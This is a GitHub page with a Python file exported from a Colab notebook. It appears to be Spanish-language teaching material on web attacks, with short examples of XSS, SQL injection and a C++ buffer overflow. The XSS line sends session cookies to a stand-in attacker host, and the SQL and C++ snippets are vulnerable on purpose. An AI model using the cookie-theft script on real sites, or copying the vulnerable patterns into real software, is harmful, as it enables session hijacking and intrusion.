TGA2/ataques_web.py at home · oigaprof/TGA2 · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
# -*- coding: utf-8 -*-
"""Ataques Web.ipynb

Automatically generated by Colaboratory.

Original file is located at
    https://colab.research.google.com/drive/14IozrfqusyGPIGrPH-fKmjX_a6JzYfcj
"""

#5.1.1. Ataques de "Cross-Site Scripting" (XSS) - Ejemplo de código en JavaScript (para fines educativos)

// Script malicioso para robar cookies de sesión
var img = new Image();
img.src = "http://atacante.com/robar-cookies.php?cookie=" + document.cookie;

#Explicación:
#Este script malicioso se inyectaría en una página web comprometida. Cuando un usuario visita esa página,
#el script se ejecuta y envía las cookies de sesión a un servidor controlado por el atacante.

#5.1.2. Ataques de Inyección de Código SQL - Ejemplo de código en Python (para fines educativos)

# Supongamos que 'username' y 'password' son entradas de un formulario
username = input("Ingrese su nombre de usuario: ")
password = input("Ingrese su contraseña: ")

# Consulta SQL vulnerable a inyección
consulta = "SELECT * FROM usuarios WHERE usuario = '" + username + "' AND contraseña = '" + password + "'"

#Explicación:
#En este ejemplo, la entrada del usuario no se valida correctamente, lo que permite la inyección de código SQL
#si el usuario ingresa datos maliciosos en los campos del formulario.

#5.1.3. Inundación de Buffer - Ejemplo de código en C++ (para fines educativos)
#include <iostream>
#include <cstring>

int main() {
    char buffer[10];
    std::cout << "Ingrese una cadena de texto: ";
    std::cin >> buffer;
    return 0;
}

#Explicación:
#Este programa en C++ es vulnerable a inundación de buffer ya que no valida la longitud de la cadena ingresada por el usuario,
#permitiendo que se exceda el tamaño del búfer asignado.